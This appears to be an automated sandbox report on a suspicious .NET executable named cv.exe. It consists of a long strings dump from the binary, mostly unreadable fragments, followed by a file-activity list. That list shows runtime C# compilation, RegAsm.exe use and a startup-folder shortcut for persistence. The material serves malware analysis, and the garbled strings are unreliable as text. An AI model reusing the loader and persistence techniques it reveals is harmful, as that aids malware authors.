UOL
+$9[
y=#s
Pb(G
ReadLine
=m_l
oIQ z
:?FE
0VG[
$> "D
& 2+
I\x%
I#VU
o"iD
.a1:
RzBBd
k^wH
%zHBn
> ^*I
{Ciq]
.xQG
~)5}" ^
ol%j
R+XW
BN)"
RkVF
=mQP
$]2-
HdsZ
.V'o-'
UL%i(9
BOXs
QDMm
ZN?zTW
&#D
Lr!}m
Z8]l
$:}n
tvo.
twyq
%wGH
MV y5
m!\k
Q#OZ!
6:5X
!This program cannot be run in DOS mode. $
322ENDt
R-Qy
qgB.
/8.%
{}AX
File
fu$Z
+Aor
'"TcSS@~
VR&x
<8Gl
Uk6^
*2C6
)o)>
~<3w
X/)[
((!NA
B8Gu
Mv@`9
Iz_(
pvu2kE
SqlPerformanceCounters
,?w
1!N|
E#u*M
UUD>Q
V@4t
@oC
o&q=
[Ac{BzH
wGcRq5<
+/B-
U`jR
[3aO
d%<~R
/GW'
XqlHk
fGvd"
Aqfa|it
+Jw
set_GenerateInMemory
;2q
p499
$5OEZ
s,+%[Vt
` +
o\ 7
&-]f
kfqZ
le:z5'`
`gdN
86tr7
#':;
C|S=
(2hJc
\3 ]
wCIS
d2x+]
*sKj
h|lqx
fFcD
u<4S:
*ci1rt
YE8i%z
h0:'DDId
>fLw
DIr
6UM2Y
*6W
YPj2
VwuK*H
!3r.
`c8(4gh
`X8z
vx1T
#wMP
nQ6#
,q;V2
/<2?
1^l|
7;7]
kF{RR
DbReferenceCollection
%Ku@*$J(D)
oaM|
D:.D
-~@m
bw gW
!0<!
DJD-
ctNc
zEX}
CxYk
Z7[&
iYM6
w$0)
*FKX
:SVP
(gUd
3,aaJ
7rh;{
R'IT
l[kk
hpO@
O&PJL
e~?N?
vkn]<EO
9t^F
QV*/#-
!goc
NF!LT%k
h=Y9`
Ftt3
g :/
g6&^%>#
[2tU
2L1$
VC-P
@44~7
]|Y%~O
MEDN^
F%DA
V&!E
MG]\&}7
nlC<
IListListener`1
6#cL
>z0 I
:GWu
, #Z3
](8j Q
|DAM
[<&yp
}&(y
F).^s
D5z
rv7C
,U8f
e9u%
System.Collections.Specialized
$S;\
)/Dc
H\Xj
:x2o+
}4?q
,>\eD
*`~q
3Y=?~o
zp="\
K}SX'
f QMr
ToolStripManagerRenderMode
3O:m
aDA_i
EtwEnableCallback
!EG2
' ?O
{HC784yk
I;="6
^tB1
;nO/
Zd>5
(u!d
/3sl
SZ\2D&
;;5K#RP
|?(v|AO
.h'.C
yfFY
8J0M
ufZ!
4p\[4
-N^31G
L^}d[r
Md V
`_tH
wqtD
2(M{
lE-A
@;^
%&@)
c5+B
;Tcq
I2Y}h
4)mx
SbG-
)` 8
%yp"
b>K?
6pRmr<
DataGridRelationshipRow
?~f2
o7YrAw
Z"IdA
^Kb4
EventRegistrationTokenListWithCount
f\hg
jLW v4f
BKt#
LpA4F
^JU<
w_.H
j&.U}
opE\
Y\]>(
zYM
\O=!~
LS8F
akF Q
h!8J
Wb n'
|^B/1
Rwf4
X>8j
T`8UW
!LW)
#CnP
zar62o
L#s ws
X'l
Aw ]i
-GZV
7v{/
N[(H8K?
(yDc
E eY
3B2jXv
S~UM9S
kKU{Rk
T|=^?5;Co
mx;W
`N*`
B(>.
60 >
< v9'
7ieJ
v,5qN
Y_d\
A{ oS
b1 M
Z:#7
quc a)5
Dcr
)yk?6
7):Od
#X)LC
^,A>!
qyg,
e 8(%
G44g
p#zbsa`N
)&xX;FZo
<N[6
`l4&
EY/1
} v"
(f7 l
0AG
Vr8G
iYiB4
X[<a
y s
k#P
:FpD>:
?%5p
PCCN
ET.8
ht~@
ld
Q,K
Te5mcz
J@Qtk
MPj,T
eF[q5
cq j_B
^uZ}
&{V
MethodInfo
RJ*D
zDYPv
9g3`o
n \mcX
osME
#YrE
rkKcl
ed5iYY
+aMm
g:zn
zD BGt
WB}SX?
z^{3
)M!:
Q;2C
^=k$
FL=J
jMBs8
Kx Y3
/Y@E
:IAh4["k
UvTj
?OLMg5Z
^Yrp
2&2+
zDQr2
q"q)
;h4l8
s~N'
{N')
&a78
$E# z
<>c__DisplayClass6_0
S{.X
GridTablesFactory
wb:)
(&t*
,F7r
V>9<iF
XdHn[
^!-T*
'c]
\*g$
u6<)
] \,
So'V
qnos
$m]^
+ S#
8Op
QX-O
6eYi
!' i2
>}~~^nuz
q=3d
nqM6 m
u* 4
=v0QS
w$X/c]
XLx+zW
*KU
" RS
CAOdp
y/Hhp
CTA\
8HA{
7.Fn
ty6
egtT
0 ,O
fI^UA
v2v1
}5m-
7x.F
please
4us2
z [Rg~<
+!a7
)pN8
v NDE
Ov%k
CachedCodeEntry
SO'=
_:)ze
kf5*
IEND
jL'*
SeX_
}oVze
%y{qM
DDI}
oj~.
VSp;:O
Il2O
ajOw
{niI
Lp<V
Geb?h
z`$4&
1o,W@
"iG#
6L;94
I0fm
?hwB
/{xA,%
U8E#Wm
G<D]
j%fO
5<<K
" P"
>EC
qj
q+810
\(4s
R ukd
&EcD}
wK&|
%0Or
A8>.
' 4#Uyh<
~O 0
F-opNVN[
Je?y~
MWrtk
1uzF
fDE%
'^R(
(DAYO
\3Mu
bNs?
'^R#
nlt+q
y-\G`
1qV0
*u g
3wny,W
Nxf_
:[kvV
K(D7
5MVy
( EcF:\
*RE2
I'| N
[eOG
z^Q<
^^~.
Mj D
CSharpCodeProvider
5{R~
cjr
LL' N$
yoU M
ae9
,RPe!bs
ce[r
x<[<
dx<L
k|bC'
nD 1a
lrb
Ammj
L @|
/.t
qAI&
$c@"
v-:c
+(9
[wF~
%)Da
7y4y:
9)RT
v9k[
}Cc
"e&0ny
b, p-
{zg
B'HBTh
H#R{hA
.Toe
RCp64
NDUX
19t1
lJ><
abfq
kv9W
72+D
)3r w
P;*i
W}EA
BD0)
yCJvu
(#r<
f Yy
{d 1
jvv+X/
Jton
HX :
gD[8
d 8C\;
az9@p
,BCU
SqlAes256CbcAlgorithm
B,i
X_G,]
.d:}
\T%"n*c~Ll*1%
qez)
/4"*$
4c0Z
"20Z
f'nUbF^
M.2A
4&VL
`$10
jmvm
V/0+:
uL.G
C. '
System.Text
2+LW
na9"
qD8
kw[3Z
_EUK
3( +
A\ev
~{CX
t*s*
o!qD
kd9V
d$K^
hI,_
l>g#
k\ z
p(2a
VLChP
H6\+
}oRe
@N|v
!VkgG.R
Dz0a
%;k9
`2^C
NLCW
C;YC>[
Uf,s
1W+5
se?Dk
_I[ $
y?m+C
>%729
x]} R
p7{;
W]h~
I'SE
tC%{Qvr
erM3E
U8G7 OY
F*F*
Jy\y
u&Fd
/ yB
v@>'
DM$\
}:Hf
5;[
rzFp
w,Gc
zauz'
DCSg
rGq~Z
={ 0
hI*T
Y q"
~lJ"
()6+
o~Eit
bWdi
.D;{
V|D!Y
1Wp
1u<V
76\_
{t|o=
HIN$
7S H7
jB !
mev.
k&G]
2_73.y
R QKla9
G9^k
svhey
)r
:YrM9<~
H;rp
G@'$
O"J
9>j)
F4huD
9}[}
r(@*z
Z}46
M6F!
F>6L0
su, MFuZ
*5}a_
Spl&
2(n8
CR{dI
V l=
;*D1
DMsf
,kCh
B[qU1
L-v
C6P\
c3-
l?"s
r` 9
m!BA/
$g`]
rl.'+
J&DD30!
}c%m
XB.k9}
Wxu)Sx
$7,7ni
_CorExeMain
z}cf
ZeD%
hTS
H=!_
;/Ek
yDYGG
o6JA
wzNK
k *%
@tnj
xwFDC
K:4gp8\
[Yjo
-^m8$
YCwJ
hp:J|j
VI3t
ie't
mT5i
@4tvE|
g= {
.f:02
{Un
]|.Y
#S4Y
9.ix
DebuggingModes
OT$!Cd
@]J+U
2fj]
UJ>{
PYX
fU/w
KqJz
E<Ie
YBpp>
jFgL#j
125w
s:NAm
TlPp
#^Z@
q{52E
0>>7TL
7_
q]5~S
p (-
GHaOo
>'pn{d
KQD=
=f*G
F>.MdjY
am>2
X[td%R
"O n}
x6EH
"6-;S
\\!:
-h- "
AOWnx
~aQ^
k9UY`
[ VZ
`;l0N
s3 y
.6"d
1G(
jLWc
v#SQ
T4G&
RDCqG
AccessorComparer
Z9\]
eXWO
,5K|
CompilerParameters
$4@W[
ei\Z
`nry
J#sL3
maW[!
/c>!
XjD/d
zRQP
U@Y
0'U^
;$a_
vu zd
c>GA
+-47;
Ao("
1@ <J|
,BIh}
D}C`
[I3b
[,%j
VUGf
ACxd
7~,/V
pS/k
Z1]Eu
{}X}va
XE&&
oOY
NzC{
hAYOe+
v79~
ex,T
`[//
Ry=]
P^;Vssb
j} p
vA +h_
=(N
f PY
{Vu e
NCZe
%A9C|W
%i(b
3i2u
::[}
oj:K=e
xtaJ
X_m-(
ToCharArray
})NC
9 Sus
QKmP
D>WE
RVMc
!#(/a
@dPBE
N gH[
Hl >"
?k`ox
V:a>NM
DebuggableAttribute
{(:#x
@Gkb,
HbpR
y6FdMV
<\y?E&
Hpt6
#>gr
GFZ
m}gd
D{ 6
ke{XD/G
J SK)v
a44-"nB4%
CY"3
{x{Wc
Reverse
:!h
]hwV
{aZ0
{E'B
HLGx
OOtD]
CdAlp
yH8f
% H\
M9pU'
pTB4
ggxY
V] Q
'9`JM
if H
95OLA
WQOVv
, N"
y +g
%j9H_
TQ=
r QSy
&l 9B$
t< T
U<_*
|ASM
24XC
l!rb
[h:E
%(*J
5)c3
,Icd
m)gy
u_3Q{
imT:
Jm?B*
vB=5#
z!8j{
dW_e
J]dF
t [s1:S
WCLj]
vD?)
Tk8$
5gk ;W
/)><
l 14#
:\(&
?b=MA
~i2.
HKlrz
yO@!s
1]Fq@
hEV}
^q,8'
vF_dR
('0!
neG?
vwp16
Object
Z I)
j\kf(
+G^<q=
zu^Yi
N(N-
#jAKv!
$c D
i6>#%
UD5}.
vDMC
\4Y;N
F4r"YS
oTQt
,'4@Fp
]sN!
@|Cd
OfhS<
}^~;M3vH
W`Ve
vo$F
D)8
ieEvI
1^kv<
*A#
}oEw
Nm{q
G}@H=
jIbH
XO`%&E
|.m1
H99(`n
?OOg^
Uk ,cG
@.|G
tJyd
u&WS
`uu>
Jxl;
% \d
$9HI
)n;_
CngKeyBlobFormat
+J@:b
qO*S
T3i:
^^N?
{R|) ^
Z/m}
jIbd
9hh4
; >fS
'`P6
# O1
h&L
9!#6
ry(m
B>DA
['T/
6=d$
z+/i
*L[,
Ji%R
X+8E>
?/OI5
?{o*
U_,<
^OzIJ
nC Q
N8uk
]*wc
#J"
wkj(
YEt1
8{z=
8D!#
@Gkl+2
YJ?0
-XeMf$
7sZ
4zCv@w
f`*-
/BT$
t<Bf
*ci9
%cDli
31<EW
$
a3ps
AQ@j
!P?9
;<[tY
c~ #u
Nu0\A
F'Xu]g
t25a
M~[$U
VWgW
to3g
x3Eg
SQ 8._
<};CO
8G /%
m=@Vj
cI3Z
&9bd
~7;:
PQ:d
+ETb
7Za?
R%q8FD
z|`w
5m@O
sRGB
ao|EX
n2+Nl
Udgk4
uD^i
pKKv(G
;v{
-nAd
CWiv&i
dW;""\[Z
Exit
CompilationRelaxationsAttribute
?UmdS4F
#^kf:
Ykfnh
=w ~
:qO!!LG
U-_^
5[,@
7iK*LM3
G( X
ehDU+
z<n
/aM3
JRiv\L6
A7'E
`.yEC
8o_Wj
N2;g
62Wx
=c$t
yIu
? o
m= =
L;sO
IDAT3
XO33A
o;bW
VDMJ
|
3&LF
THUL
iD),
2+ f
f64?V
i0\'NO#Z
Tit<
U? /Y
0 )b
@ihLG
Sq6u&
6McUzIV
Z2r6
_ -l7
?E^A
ListViewSubItemConverter
>~Z!
Eu?(
0k-
v3t:
k6 [
@18Z{
T> F
UpRG5$
McLp
'S eG=
>d]k
ypD{
32K[
(7{`z36
pe$0
IGZh
~SI"^
4t9_wC
y^YA
x`!}
ZbJ=C
% I]
@tKX
Party
C-" I-
Z<]~C
I;d
;ES/p{
.& S
Y4V6E
1D3C
5DciP
2)s
s-0,
U UPt
5qFO
zKgb+y
1DQ.QRj
mjwJ
ua8u
8}:q
aGx
++`#
@JkcN
@$Sx
EA&;
npG;
uchcfXJ
iR=zmq
0KC{
ZAOh
@ 5
_aN%+
a-0
ssye
mr#gj
BtzhkfZ
GTDO
) n@
o!4t
``8
qhbX
&bw4kP?T
7P 3
8+^01
HD0D
DjLl
H)yEYP
0 8FT
kj8eN
@| 3`
H\kvnF
<Sdb
yxUD}
8MA/
#"#vn
Rkxu
as akR
of+xX!XX
h-d@
'}{!
kr3t
={S.
b`8b
Av==F
r|?
T"C[
[t~F
]9EP+
Ju8Zkv
?T*9B
?T2Z
BtDR
$ %u
{U'C
e ^
.mcm
DK1G(
fePV
Ffql*
sHB$
, )c
9HZ+
(#+]
TOh-|;
7H;|'
}}hy
i! hf
}]v_+zX
zACm
lV[D
)S}C
K7kvh
;( zFC
{f><,
V\>D/
y7YXPZs
m<pp;?X
=v?'
JDDA
L~UH
,a]3}.
rF*
L%y
" Yv0Er
53jk
0 O
qMY;t
Rpp3h
|4ZYn
W}$td[
~D9=
SM0"5!
c&DA
rLYy
qqZ*b
Zr/+
>^L[
*Frq
_6/|f
VAA_
]>w$
1>oLQ
`.rsrc
C GW?
*ky9|
h$tcZ
33Ws
gbDK ^>
aZ0J
L w!
(j`24
UC97
Tt<K
's@QV
TYGd_
LC{
']@?]
+?Dc-|
. **4
"K0?
9p8r(
ZUW!
yTIv#k
Ks3=
.NPm
G3ZB
d~:
+m$&[|
4Ac1
Rz9r
&{;&0-
#rT3
B%#^W
ZDm
{R.D
vsaK
<M)Y
gvjq
hk|P
U+We]3B
Z33(
tc:s
UhP]
JLAI
BY`Y
{SfOO
L% 3
J'#q
#'pd
nDD?
3tH8
dErrj
30*M
Y ~F
Rr:
/t%j
A6 6!@
pK[W
DataSet
uHK`J
-5vGq
8HRD
^;3#
Be If\XB
Bgn.2?U
`p_"
V~i0
8b
u8F5
'sKk
zaEW
TmG4
3bv|
% *5hF
L)9l
%M?<
KW5$}
Yt'=
v(Lv
0 M{6
@g8<
DWoB
B]j
Gts*+
EiI%,t
3N;5
/#j
F4nk
eHe3
&ibg5
,(e,
!%JTZ&.
ZN P
:sLE
i#X
4-/I
0] PS
!C0D
/}DHC
F`NQ
um#0J6
5;B^
S .EX
h-.R
D{|
[Uq"
RegisteredChannel
0 CU{
m)} b
BPhi
$4i
jLIh
*dYr
~l_iv &8
0,EF
j`m\
|nm8
-^ E
:wR
c7= 7
t$^HaS$
} |W1
hRqD
A_ha
9v 5CY
ocD{X
:@rP
~ 1B=:
Bxq<
,+V[
I%rMNu
~HDS
6(:g.
.I^C4
]lf%
Y 0
[p83
9Vok
f;Zo
\kv9
&GEq5*z
gQ%WQ
~Ijl
}B&&
GM4G @
iyD%W
fvs7|
31"f:c
6=CS
= TR
ZV p+
~DQeI=
;\N.
kVo-
BIiP
iF|D^
Pww8
QN%:
pv4
3gUV
j4>qut
[aErC
gocsh8
iKX'
\GQX
\z[@]o
~oc7
|"D?
= F
H'-F
g~I
DAh?
dVul
o *xB
NNz%
trf@
N9ewm
}gMY
cWV
IDAT
DCW|
;g<d>"
~XF4U
EDCWs-
*R,i
6eR7
d Z
Aq$4'
}%mN
%!Pv
>_ ]t3
|)<e
mwe
|DI~
?8=.uy
!,*=
ksvJ
W'GGj;
i GG
imZ}
=d>"
E Ny
:taf
361-_
RjoL
<1HDL
^c V
.MO4
y ^D
;\CM
YiT[
aiw5
JWer
System.Runtime.CompilerServices
oD:i
fxnw
HLAg
:`7]
>D \
5D$b
jFcDnVnCC+
E'Di
C`UU
zQIy
Uw<J
DIfLC
(5K)
f~q^Te/o
t K,2
p!_|D
'\m(
:C]_Y
3\e
xs\Ti
k-CSi{p
Y(NN
;io0
fxqK
9+N6rp
set_CompilerOptions
,s O
{a\
^ $"
{g;c
:/rX
v :
$sgkY
kr7(
Z94 `
M<BR
x*;/
-%/B
#eYl
`jT:
*/-$^
25/4
+akK
.2%(05
Yw-I
|cZql4.({g
YTkh<
8sf|#
Y2>5T2
M)<j
:2Ym5
s4M*
smp
HL"*P@t
Uc<J
_"~h=
$w8/m$=T
"kp=
Vl F"
NameTable
|C2wS
IO]f
($^#
0##::
5@kY2
)85
r3G5
_-ua
AGoZ
eQ(er
{]]
1lg/C7
P,*l
>&\?
]-%q
4 v
)y
_\AZ
~K\3
HEC#
sA}3\R
6G 9
~CwEi(
'0<U?5
WUg&
W%$%V
:nhy/
-!RO
,z j
cKnr
X42k
b!\oh
XrWJU
g=k^
C4D%
t 3mv9'
Y E%
T-#J
-eZ3
@U,9
'Mxb
aLU!aN
kF?{
K0T9
RjE{
++C1
8O(~
8&%{W
#1[l
~>EO+
e3%C
g3:)
awJq
-=!3
3Zh9d
d}_\
i za
ECs!
O> ,}
DSU^
gcDU~~
Ats/
hd b
Ou;my[4
( *m
\{/Si
-{Y7
g9hWB
}.y<2
a4nq
<Module>
@BlYN
Ra]3
ci'q
UwRq
zk,*
d_ni
Ku{G
%1/W
k:[4
{X;Mfg$
Yzmn
{Do=D\
J7G7
iUA1c
Hg[O
s}x
yP\\
Z.TAf
QPv/r
HV lK
>K 8
/<Q/U
*9G.e
+ ts
S@AW
}JY
.`7
C4RX
I\PhK4Y
KHA_
SZD5
gF|B
hop[p
}oI}
[ljo
G4'w
> |W
(ETT
~@dBU
x&K!
qy Z
r8(*
& SM]
]/x(Y{
|4;:
c&;g9
^~_Kg
#Ov^
7%i(
D El
a#ItNV
5Bq}6
'wzW
%!hb
r Rl6
MSaZ`
QbWm,n
z{vy
(I_Q
|R*$
@coJ
8;z?
o86(
~BcV
6L5
__T9@A`
g4OT(Z
<{zz
oHk>
#GUID
ij8~g
a SJ
LDC%e
EC42
(*t s}
G&y- -'|?
lINu
drink
&.m+;
$Q {
jgCO
wa32>
Z# &
!_Lt
%YuX
}9d
1Ud
pO!~
pu`y
@\$ #|
A0kv
(>c
Br?E
qgbF
'8x;kg
E,(
.VG9)
6D?qt=
+j@g
VljOK
^ ^-
43E
3Qo9-
`k)6
x_J0M
" ^<
blf.
C~Wu.P
}=JKd
lh>2. A
* !
8Z>5
rgdo
4M&V
7!MV
HgDl
:jL9z
LuK:
bc==
GZ.S
"2k#
^,;+
[C>W
CL%K
dc{
GsO *
pv5:
FhrM
z;&[aH
w^ F
#N=SP
jDEW
H"6#M
Obj)
&*Fr)
48;{BR
%gh*
pTu6
fe:Y
l :
CRYPT_DATA_BLOB
a4o}'z
X.=a
&*FrY
bFY/B
u ~Fi ?/
+DZl2
\E\F
gQ_
BpF{
Vb=F
K55LW
8 iD<
( 1 ;
UZG4
-a)
6FD-
h4<-
Encoding
>[kv
+uV1
sk%p
gBmm
l?/`
OleStrCAMarshaler
BSES
;8+n
F.?k'_ G
KL0f2
d*AM=p
vi-c
d.#=
m&X=
8OWMM
oO?Oc
p[<F4
O vY$
w@tiX
{LMx
:}\|
1tw~7
m8UDsh+
\4p95S
kV7r
|s}]
a*h>
9d_6
~tMMFi
0"55x
gSc]
gT_7
}Q*a
F8bX
YD3,
!)Q1@Nd
Jh\H
KAg*
s DO
$zBN
wP1{
TbDo0k
<"%5
5 #%9Es<
D%vm
n|Uk
7AoRY
Td.!-
Nj[
hg8>
'X=iH
[ajdG
nZH3
yT"?
>wc/
]f.[
Eq26
_C[+
)QIg.
Replace
y[}1
Qyq<
*BSJB
kV7+
eUh;
KMC-
Wl k
E#_*
OqMO
\+xYG
DJ)^
% 5O
zryD
:Ykf
%HMzy
AW=
z-A6/e
.Qm=
{eWh
2d8_
=)x;Y?;
*H*T=T
A.cG
kyP/
>Xi
C)V8
mscoree.dll
C>S@\I
3fd,
"8F4
l,/(
sh#r
U]1-
`g%9
n`~4
W<IUP,
$K
vC>KO
}D$z
$qpn
2 hT}
m4L"g
$MMR
zD&N
jpRh
eo^ 3
i:S2
Aw1b
IBX5
WjUw?
0U}P
&JWr
Mo@c
+,L#zJ
}_(602
1$fB
UaJ?1
ibxF
zG/d
2/5#F"
".BLd
b87D
c~C<
A_CX
l OR
qD>.d_
kz7b
W3\~#
uryrd
8h\-
)pr}
"<Bb
PG9R%H
1.#=
K{&"
G&ZD
Z0'SfL7<
W<d.!
JbvR
?sPwv
X~{)
2?&Ga
WriteLine
&DKh
F#1,f4
RUgFt@:weL
oNS}
{K{?d
`{@U
Kuu|
%DbH
Dx)|
-)[]
d?"a8
-,Eg
/)O
r}^-
t ^'{
+*2k
(qol
YzL
x{ /_=}
`PitZ
s;+e,|
FU`.uB&
6@Vu
.}OF%
+Xh$
!! j
S-WA~K
&*N
}cu:(
o LL
Y& I
U5Uq
o'cD
a?gG
&*^
1"DCJ
e.S(6#S
Z3o<
"M)U
W!*z
*J ]
M<I]K
Xs~Z
R|z\
uD3Io
pGcA
>w=3
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven03b_64 Seven03b_64 VirtualBox 2018-04-27 14:06:12 2018-04-27 14:09:01 169

9 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven03b_64 Seven03b_64 VirtualBox 2018-04-27 14:06:12 2018-04-27 14:09:01 169

8 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\cv.exe.config
C:\Users\Seven01\AppData\Local\Temp\cv.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSVCR120_CLR0400.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ole32.dll
\Device\KsecDD
C:\Windows\assembly\NativeImages_v4.0.30319_32\SZFexGReTFu0c2585af#\*
C:\Users\Seven01\AppData\Local\Temp\cv.INI
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.tmp
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.0.cs
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.dll
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.out
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.err
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.pdb
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Users\Seven01\AppData\Local\Temp\cv.exe.Local\
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\shell32.dll
C:\Users\Seven01\cv.exe
C:\Users\Seven01\cv.exe:Zone.Identifier
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZQQTCD.url
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Linq.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\ntdll.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\System32\mscoree.dll.local
